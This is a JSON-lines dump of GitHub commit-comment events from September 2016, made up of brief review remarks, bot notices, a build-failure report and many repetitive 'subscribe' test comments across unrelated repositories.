{"id":"4636149630","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/Madrague"},"payload":{"comment":{"id":19221243,"position":null,"line":null,"path":null,"commit_id":"b3a50976cad5139b8f246674b51d7c7574d1d48d","created_at":"2016-09-29T09:44:24Z","updated_at":"2016-09-29T09:44:24Z","body":"ezrezrzerzer"}},"created_at":"2016-09-29T09:44:24Z"}
{"id":"4636154405","type":"CommitCommentEvent","actor":{"login":"arthurdufutur"},"repo":{"name":"arthurdufutur/TP-4"},"payload":{"comment":{"id":19221253,"position":null,"line":null,"path":null,"commit_id":"b5eaa71b339b09808590f02cf7e115478e962260","created_at":"2016-09-29T09:45:19Z","updated_at":"2016-09-29T09:45:19Z","body":"tg\r\n"}},"created_at":"2016-09-29T09:45:19Z"}
{"id":"4636154441","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2-apidoc"},"payload":{"comment":{"id":19221254,"position":null,"line":null,"path":null,"commit_id":"453d93514005eaa1e5b0ed3cb2b21429e1852383","created_at":"2016-09-29T09:45:20Z","updated_at":"2016-09-29T09:45:20Z","body":"These are BC breaking releases that need a lot of adjustments in the code because from 0.9 to 1.x they changed from non namespace to namespaces. See https://github.com/yiisoft/yii2-apidoc/issues/74"}},"created_at":"2016-09-29T09:45:20Z"}
{"id":"4636155514","type":"CommitCommentEvent","actor":{"login":"mAiNiNfEcTiOn"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19221255,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T09:45:32Z","updated_at":"2016-09-29T09:45:32Z","body":"Really? So it is considered a browser if it doesn't have require, module, process and the process.type?\r\nSo if one of them fail it's a browser?"}},"created_at":"2016-09-29T09:45:32Z"}
{"id":"4636158676","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221260,"position":51,"line":126,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-29T09:46:09Z","updated_at":"2016-09-29T09:46:09Z","body":"A colleague was fired over this, remember?"}},"created_at":"2016-09-29T09:46:09Z"}
{"id":"4636168489","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19221292,"position":4,"line":96,"path":"lilac","commit_id":"248157447cfec0a4c0d4807f33063a8447c6d972","created_at":"2016-09-29T09:48:07Z","updated_at":"2016-09-29T09:48:07Z","body":"我这里加上这句以后会报错。。。\r\n使用的远程的smtp"}},"created_at":"2016-09-29T09:48:07Z"}
{"id":"4636182377","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19221319,"position":null,"line":null,"path":null,"commit_id":"2049aea49dfba35371a15865ac2a09281883f38b","created_at":"2016-09-29T09:50:48Z","updated_at":"2016-09-29T09:50:48Z","body":"Thanks:)\r\nDid you try the new kernel?"}},"created_at":"2016-09-29T09:50:48Z"}
{"id":"4636195117","type":"CommitCommentEvent","actor":{"login":"snake2016"},"repo":{"name":"snake2016/snake2016.github.io"},"payload":{"comment":{"id":19221354,"position":null,"line":null,"path":null,"commit_id":"afb1677e16c3a46b8609149a4b498950ef741fe1","created_at":"2016-09-29T09:53:18Z","updated_at":"2016-09-29T09:53:18Z","body":"add markdown"}},"created_at":"2016-09-29T09:53:18Z"}
{"id":"4636196161","type":"CommitCommentEvent","actor":{"login":"ycheng-aa"},"repo":{"name":"product-definition-center/pdc-ruby-gem"},"payload":{"comment":{"id":19221356,"position":5,"line":69,"path":"lib/pdc/resource/identity.rb","commit_id":"136f1088c209dc320f2efe0864c6df30f3cd0dea","created_at":"2016-09-29T09:53:31Z","updated_at":"2016-09-29T09:53:31Z","body":"Oh, got it. You mean old resources also changed it's url after reconfiguration. That's good. Thanks."}},"created_at":"2016-09-29T09:53:31Z"}
{"id":"4636196321","type":"CommitCommentEvent","actor":{"login":"isxiaohu"},"repo":{"name":"isxiaohu/ReactNativeStudy"},"payload":{"comment":{"id":19221357,"position":null,"line":null,"path":null,"commit_id":"226d0592d424543a2987c0f09dcbb97781108a28","created_at":"2016-09-29T09:53:32Z","updated_at":"2016-09-29T09:53:32Z","body":"##this is React Native study demo.\r\nCoding... "}},"created_at":"2016-09-29T09:53:32Z"}
{"id":"4636196646","type":"CommitCommentEvent","actor":{"login":"supermandugi"},"repo":{"name":"supermandugi/remote_test"},"payload":{"comment":{"id":19221359,"position":1,"line":1,"path":"test.c","commit_id":"d69109e6c7b5bff820f33b16e81da9146d209033","created_at":"2016-09-29T09:53:35Z","updated_at":"2016-09-29T09:53:35Z","body":"good job."}},"created_at":"2016-09-29T09:53:35Z"}
{"id":"4636201252","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"Chocimier/vcmi"},"payload":{"comment":{"id":19221371,"position":null,"line":null,"path":null,"commit_id":"381882b6d8b20998aa5abda1cb15618e48ea8a9f","created_at":"2016-09-29T09:54:28Z","updated_at":"2016-09-29T09:54:28Z","body":"Sorry I was away yesterday, but I'll try to find out why it's hangs there."}},"created_at":"2016-09-29T09:54:28Z"}
{"id":"4636217122","type":"CommitCommentEvent","actor":{"login":"finallyScholar"},"repo":{"name":"finallyScholar/fs"},"payload":{"comment":{"id":19221398,"position":null,"line":null,"path":null,"commit_id":"087ce591528588ca0b1d3314253cf20069059d68","created_at":"2016-09-29T09:57:26Z","updated_at":"2016-09-29T09:57:26Z","body":"HELLO"}},"created_at":"2016-09-29T09:57:26Z"}
{"id":"4636219749","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19221403,"position":null,"line":null,"path":null,"commit_id":"c0d062644e74e76c372e26d684b79dcfb865db55","created_at":"2016-09-29T09:57:56Z","updated_at":"2016-09-29T09:57:56Z","body":"Do you think this could fix this spurious diff? \r\nhttp://s3.amazonaws.com/diffux_ci-diffs/02fecb45-aea6-4af3-a385-6a59021d41be/index.html#PFBhZ2luYXRlZEZpbHRlcmFibGVDb25uZWN0aW9ucz5sYXJnZQ=="}},"created_at":"2016-09-29T09:57:56Z"}
{"id":"4636222214","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":19221406,"position":null,"line":null,"path":null,"commit_id":"d478cb73cc51f5f65d9061fe2a714b9b0866608c","created_at":"2016-09-29T09:58:25Z","updated_at":"2016-09-29T09:58:25Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.272.7c1f4d61d9e772b3ef415de797be61a798872099](http://build.palaso.org/viewLog.html?buildId=77201&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Execution timeout (new) Build time: 00:55:23"}},"created_at":"2016-09-29T09:58:25Z"}
{"id":"4636222283","type":"CommitCommentEvent","actor":{"login":"arentrue"},"repo":{"name":"tolkonepiu/RotatableAppender"},"payload":{"comment":{"id":19221407,"position":null,"line":null,"path":null,"commit_id":"2462d43a9030d7698b9ced1de18d8fb8edbae60c","created_at":"2016-09-29T09:58:26Z","updated_at":"2016-09-29T09:58:26Z","body":"__Approved__\r\n💭 👍 "}},"created_at":"2016-09-29T09:58:26Z"}
{"id":"4636224137","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19221412,"position":null,"line":null,"path":null,"commit_id":"a414d20846c465c55f67a7e87cbe27f5b32fb73f","created_at":"2016-09-29T09:58:49Z","updated_at":"2016-09-29T09:58:49Z","body":"I wonder whether this should be guarded with a timer of some kind. Right now, I can press ScrollLock (maybe to use ScrollLock, as simple as that…) and then, a few hours later, press ScrollLock again, and it will trigger muting. Intentional muting should only trigger when ScrollLock is pressed twice within a short time, I think."}},"created_at":"2016-09-29T09:58:49Z"}
{"id":"4636224504","type":"CommitCommentEvent","actor":{"login":"jsugarman"},"repo":{"name":"ministryofjustice/fr-staffapp"},"payload":{"comment":{"id":19221413,"position":null,"line":null,"path":null,"commit_id":"9decce41304248b7fe2518a436dab8d91a932a09","created_at":"2016-09-29T09:58:54Z","updated_at":"2016-09-29T09:58:54Z","body":"sweet!"}},"created_at":"2016-09-29T09:58:54Z"}
{"id":"4636226401","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19221417,"position":null,"line":null,"path":null,"commit_id":"c8a0fe69f17e3770863f5f5de439f7db8db6885f","created_at":"2016-09-29T09:59:16Z","updated_at":"2016-09-29T09:59:16Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=55)"}},"created_at":"2016-09-29T09:59:16Z"}
{"id":"4636227573","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19221420,"position":25,"line":96,"path":"src/main/drivers/accgyro_mpu6500.c","commit_id":"61e5fbd40386abc02b63b17fe1c33b748e838ca7","created_at":"2016-09-29T09:59:30Z","updated_at":"2016-09-29T09:59:30Z","body":"Registers are updated based on mode - see register descriptions. With filter2 enabled `(lpf > 1 && lpf < 7)`, update rate is 1k.\r\nThe problem (from discussion) is that sample rate divider is used only with filter2, so you can't use sample rate divider to scale 8k (and higher) modes."}},"created_at":"2016-09-29T09:59:30Z"}
{"id":"4640706056","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234226,"position":16,"line":15,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-30T00:00:14Z","updated_at":"2016-09-30T00:00:14Z","body":"cacheSolve  <- function(x, …)  {\r\n## Return a matrix that is the inverse of ‘x”\r\n\tm <- x$getinverse()\r\n\tif(!is.null(m)) {\r\n\t\tmessage (“getting cached data”)\r\n\t\treturn(m)\r\n}\r\ndata <- x$get()\r\nm <- solve(data, …)\r\nX$setinverse(m)\r\nm\r\n}\r\n\r\n\t\r\n"}},"created_at":"2016-09-30T00:00:14Z"}
{"id":"4640717837","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":19234255,"position":null,"line":null,"path":null,"commit_id":"c793bd105ec98a20ac09d0c67576f6f8c48ba027","created_at":"2016-09-30T00:03:41Z","updated_at":"2016-09-30T00:03:41Z","body":"I was thinking more about the security guide. Can we have a document which would describe security model of H2O. From user perspective, from dev-ops perspective, from developer (internal security). \r\nJust reacting after a tone of questions about security at Strata."}},"created_at":"2016-09-30T00:03:41Z"}
{"id":"4640718914","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19234258,"position":null,"line":null,"path":null,"commit_id":"f5d98bb0b52e67c9514f8d17a8b83ebdfa2cf976","created_at":"2016-09-30T00:04:01Z","updated_at":"2016-09-30T00:04:01Z","body":"I am not a fan."}},"created_at":"2016-09-30T00:04:01Z"}
{"id":"4640719855","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19234261,"position":6,"line":11,"path":"language-project/dao/src/main/java/com/language/dao/ContentDao.java","commit_id":"c6dc49c6399bbfcec4d36cac51df79a53291f0d3","created_at":"2016-09-30T00:04:18Z","updated_at":"2016-09-30T00:04:18Z","body":"Для согласования с наследием."}},"created_at":"2016-09-30T00:04:18Z"}
{"id":"4640722157","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19234271,"position":16,"line":13,"path":"language-project/web/src/main/webapp/views/continueCourse.jsp","commit_id":"c6dc49c6399bbfcec4d36cac51df79a53291f0d3","created_at":"2016-09-30T00:05:05Z","updated_at":"2016-09-30T00:05:05Z","body":"Потом. "}},"created_at":"2016-09-30T00:05:05Z"}
{"id":"4640725650","type":"CommitCommentEvent","actor":{"login":"lovenumbers123"},"repo":{"name":"lovenumbers123/ProgrammingAssignment2"},"payload":{"comment":{"id":19234277,"position":13,"line":12,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-30T00:06:10Z","updated_at":"2016-09-30T00:06:10Z","body":"This function determines if the inverse is computed.  If there is an inverse in cache, then it skips the computation.  Otherwise, it will computer it and store it in cache."}},"created_at":"2016-09-30T00:06:10Z"}
{"id":"4640727277","type":"CommitCommentEvent","actor":{"login":"diegobrum"},"repo":{"name":"argilando/365-dias-de-agir"},"payload":{"comment":{"id":19234284,"position":null,"line":null,"path":null,"commit_id":"a81b3b6f4af28ce54a39f65bbdd3f5fd8d6e2834","created_at":"2016-09-30T00:06:43Z","updated_at":"2016-09-30T00:06:43Z","body":"#1 "}},"created_at":"2016-09-30T00:06:43Z"}
{"id":"4640729246","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234288,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:07:22Z","updated_at":"2016-09-30T00:07:22Z","body":"readme-edit"}},"created_at":"2016-09-30T00:07:22Z"}
{"id":"4640730213","type":"CommitCommentEvent","actor":{"login":"parvezpatel30"},"repo":{"name":"appsmehta/CMPE202-CSUnplugged-PeruvianFlipCoin"},"payload":{"comment":{"id":19234289,"position":null,"line":null,"path":null,"commit_id":"379b635e63debe3b824ea6dac923f58c99306ddf","created_at":"2016-09-30T00:07:39Z","updated_at":"2016-09-30T00:07:39Z","body":"Give this image a proper name."}},"created_at":"2016-09-30T00:07:39Z"}
{"id":"4640731143","type":"CommitCommentEvent","actor":{"login":"greg-king5"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":19234293,"position":44,"line":186,"path":"doc/pce.sgml","commit_id":"996c7b493e6111533b8c919b98b49cf7ce29bc45","created_at":"2016-09-30T00:07:56Z","updated_at":"2016-09-30T00:07:56Z","body":"Shortenned that URL: 23cfb51e7297963b70a3c89a8c2720c817c9bb5f."}},"created_at":"2016-09-30T00:07:56Z"}
{"id":"4640735515","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19234310,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-30T00:09:22Z","updated_at":"2016-09-30T00:09:22Z","body":"我好像说错了什么………的确不是这么用的【趴\r\n我本来就是福建人啊…还是闽南的 所以 知道是啥啦【趴"}},"created_at":"2016-09-30T00:09:22Z"}
{"id":"4640742153","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234350,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:11:31Z","updated_at":"2016-09-30T00:11:31Z","body":"subscribe"}},"created_at":"2016-09-30T00:11:31Z"}
{"id":"4640743350","type":"CommitCommentEvent","actor":{"login":"hhostermann"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19234352,"position":19,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-30T00:11:54Z","updated_at":"2016-09-30T00:11:54Z","body":"corrigido"}},"created_at":"2016-09-30T00:11:54Z"}
{"id":"4640743458","type":"CommitCommentEvent","actor":{"login":"orlandw2016"},"repo":{"name":"ikarus23/MifareClassicTool"},"payload":{"comment":{"id":19234353,"position":null,"line":null,"path":null,"commit_id":"3493e9e1f77a1519836d492a27af1fc9bbd14ff4","created_at":"2016-09-30T00:11:55Z","updated_at":"2016-09-30T00:11:55Z","body":"galaxy s4 compatibility"}},"created_at":"2016-09-30T00:11:55Z"}
{"id":"4640743862","type":"CommitCommentEvent","actor":{"login":"hhostermann"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19234356,"position":22,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-30T00:12:04Z","updated_at":"2016-09-30T00:12:04Z","body":"corrigido"}},"created_at":"2016-09-30T00:12:04Z"}
{"id":"4640744420","type":"CommitCommentEvent","actor":{"login":"avluis"},"repo":{"name":"PaoloRotolo/AppIntro"},"payload":{"comment":{"id":19234357,"position":null,"line":null,"path":null,"commit_id":"b2cb52707d208217fc719160028de61c95a59e07","created_at":"2016-09-30T00:12:15Z","updated_at":"2016-09-30T00:12:15Z","body":"Love these edits -- I need to add some html comments to my repo as well so props for having me learn something today~"}},"created_at":"2016-09-30T00:12:15Z"}
{"id":"4640745454","type":"CommitCommentEvent","actor":{"login":"hhostermann"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19234364,"position":23,"line":30,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-30T00:12:35Z","updated_at":"2016-09-30T00:12:35Z","body":"corrigido"}},"created_at":"2016-09-30T00:12:35Z"}
{"id":"4640745830","type":"CommitCommentEvent","actor":{"login":"hhostermann"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19234365,"position":30,"line":37,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-30T00:12:39Z","updated_at":"2016-09-30T00:12:39Z","body":"corrigido"}},"created_at":"2016-09-30T00:12:39Z"}
{"id":"4640745987","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234366,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:12:43Z","updated_at":"2016-09-30T00:12:43Z","body":"subscribe 1"}},"created_at":"2016-09-30T00:12:43Z"}
{"id":"4640746381","type":"CommitCommentEvent","actor":{"login":"losborne"},"repo":{"name":"EC544-Group-8/challenge_2"},"payload":{"comment":{"id":19234369,"position":62,"line":205,"path":"public/javascripts/chart.js","commit_id":"47ea231097146912879ca143b792f251d072bb2e","created_at":"2016-09-30T00:12:50Z","updated_at":"2016-09-30T00:12:50Z","body":"I don't think we need to update the historical data like this--when the page loads (or some other action happens causing the historical chart to refresh), the function above will already grab all the historical data.\r\n\r\nThe historical chart doesn't update in real time.   This might duplicate data (not sure)"}},"created_at":"2016-09-30T00:12:50Z"}
{"id":"4640747185","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234372,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:13:06Z","updated_at":"2016-09-30T00:13:06Z","body":"subcribe 2"}},"created_at":"2016-09-30T00:13:06Z"}
{"id":"4640749068","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234380,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:13:41Z","updated_at":"2016-09-30T00:13:41Z","body":"subscribe 3"}},"created_at":"2016-09-30T00:13:41Z"}
{"id":"4640749494","type":"CommitCommentEvent","actor":{"login":"Andrew-Quebe"},"repo":{"name":"PaoloRotolo/AppIntro"},"payload":{"comment":{"id":19234382,"position":null,"line":null,"path":null,"commit_id":"b2cb52707d208217fc719160028de61c95a59e07","created_at":"2016-09-30T00:13:49Z","updated_at":"2016-09-30T00:13:49Z","body":"@avluis yeah, I opened an issue on Glide's repo and really enjoyed how the template was set up. Just now got around to implementing it into our library :P"}},"created_at":"2016-09-30T00:13:49Z"}
{"id":"4640750428","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19234386,"position":null,"line":null,"path":null,"commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T00:14:04Z","updated_at":"2016-09-30T00:14:04Z","body":"What does tablemaker.php do?"}},"created_at":"2016-09-30T00:14:04Z"}
{"id":"4640750878","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234388,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:14:13Z","updated_at":"2016-09-30T00:14:13Z","body":"subscribe 4"}},"created_at":"2016-09-30T00:14:13Z"}
{"id":"4640752005","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.search"},"payload":{"comment":{"id":19234391,"position":null,"line":null,"path":null,"commit_id":"6b577f7acb2e482d2a5d4e4a35ac48ab1f085278","created_at":"2016-09-30T00:14:34Z","updated_at":"2016-09-30T00:14:34Z","body":"@garbas you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-30T00:14:34Z"}
{"id":"4640752049","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.search"},"payload":{"comment":{"id":19234392,"position":null,"line":null,"path":null,"commit_id":"6b577f7acb2e482d2a5d4e4a35ac48ab1f085278","created_at":"2016-09-30T00:14:35Z","updated_at":"2016-09-30T00:14:35Z","body":"Timo Stollenwerk, Anthony Gerrard your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T00:14:35Z"}
{"id":"4640752567","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234395,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:14:45Z","updated_at":"2016-09-30T00:14:45Z","body":"subscribe 5"}},"created_at":"2016-09-30T00:14:45Z"}
{"id":"4640753225","type":"CommitCommentEvent","actor":{"login":"Realtin"},"repo":{"name":"finnp/hardware"},"payload":{"comment":{"id":19234398,"position":16,"line":6,"path":"tessel.md","commit_id":"5b999c0108fc66aa26c99146d3f689f6e35da7a1","created_at":"2016-09-30T00:14:56Z","updated_at":"2016-09-30T00:14:56Z","body":"😭 "}},"created_at":"2016-09-30T00:14:56Z"}
{"id":"4640754192","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234402,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:15:15Z","updated_at":"2016-09-30T00:15:15Z","body":"subscribe 6"}},"created_at":"2016-09-30T00:15:15Z"}
{"id":"4640755938","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234408,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:15:50Z","updated_at":"2016-09-30T00:15:50Z","body":"subscribe 7"}},"created_at":"2016-09-30T00:15:50Z"}
{"id":"4640756340","type":"CommitCommentEvent","actor":{"login":"vitorsala"},"repo":{"name":"vitorsala/Compilador-MiniJava"},"payload":{"comment":{"id":19234410,"position":null,"line":null,"path":null,"commit_id":"30ec769fa1614de8e3fbf89a561863b55b1c9e39","created_at":"2016-09-30T00:15:57Z","updated_at":"2016-09-30T00:15:57Z","body":"Git não deixou eu terminar....\r\n\r\nArrumado um bug que estava pegando lixo da string por falta do delimitador....."}},"created_at":"2016-09-30T00:15:57Z"}
{"id":"4640756961","type":"CommitCommentEvent","actor":{"login":"vitorsala"},"repo":{"name":"vitorsala/Compilador-MiniJava"},"payload":{"comment":{"id":19234412,"position":5,"line":22,"path":"src/util.c","commit_id":"30ec769fa1614de8e3fbf89a561863b55b1c9e39","created_at":"2016-09-30T00:16:10Z","updated_at":"2016-09-30T00:16:10Z","body":"Wololo"}},"created_at":"2016-09-30T00:16:10Z"}
{"id":"4640757430","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234415,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:16:20Z","updated_at":"2016-09-30T00:16:20Z","body":"subscribe 8"}},"created_at":"2016-09-30T00:16:20Z"}
{"id":"4640758761","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234418,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:16:46Z","updated_at":"2016-09-30T00:16:46Z","body":"subscribe 9"}},"created_at":"2016-09-30T00:16:46Z"}
{"id":"4640759469","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19234419,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-30T00:17:02Z","updated_at":"2016-09-30T00:17:02Z","body":"@henrypp \r\nUpdate to build 116\r\n[Simplified Chinese116.zip](https://github.com/henrypp/wfptool/files/501936/Simplified.Chinese116.zip)\r\n"}},"created_at":"2016-09-30T00:17:02Z"}
{"id":"4640760230","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234420,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:17:17Z","updated_at":"2016-09-30T00:17:17Z","body":"subscribe 10"}},"created_at":"2016-09-30T00:17:17Z"}
{"id":"4640761741","type":"CommitCommentEvent","actor":{"login":"syugoing"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19234425,"position":38,"line":56,"path":"app/views/layouts/application.html.erb","commit_id":"f38293bd733d76fa5b24605ccbea8f3da53b94d7","created_at":"2016-09-30T00:17:49Z","updated_at":"2016-09-30T00:17:49Z","body":"失礼しました。"}},"created_at":"2016-09-30T00:17:49Z"}
{"id":"4640765376","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234439,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:19:05Z","updated_at":"2016-09-30T00:19:05Z","body":"subscribe 11"}},"created_at":"2016-09-30T00:19:05Z"}
{"id":"4640767120","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234443,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:19:39Z","updated_at":"2016-09-30T00:19:39Z","body":"subscribe 12"}},"created_at":"2016-09-30T00:19:39Z"}
{"id":"4640767192","type":"CommitCommentEvent","actor":{"login":"syugoing"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19234444,"position":4,"line":4,"path":"app/controllers/comments_controller.rb","commit_id":"84a48c41fc164ff2aa02f6058dd873c87b434945","created_at":"2016-09-30T00:19:40Z","updated_at":"2016-09-30T00:19:40Z","body":"そのような規約があるのですね。承知しました。\r\nその他の場所においても、無駄なコメントは消しておきます。"}},"created_at":"2016-09-30T00:19:40Z"}
{"id":"4640768753","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234448,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:20:08Z","updated_at":"2016-09-30T00:20:08Z","body":"subscribe 13"}},"created_at":"2016-09-30T00:20:08Z"}
{"id":"4640769926","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234451,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:20:29Z","updated_at":"2016-09-30T00:20:29Z","body":"subscribe 14"}},"created_at":"2016-09-30T00:20:29Z"}
{"id":"4640770945","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234452,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:20:51Z","updated_at":"2016-09-30T00:20:51Z","body":"subscribe 15"}},"created_at":"2016-09-30T00:20:51Z"}
{"id":"4640772268","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234456,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:21:20Z","updated_at":"2016-09-30T00:21:20Z","body":"subscribe 16"}},"created_at":"2016-09-30T00:21:20Z"}
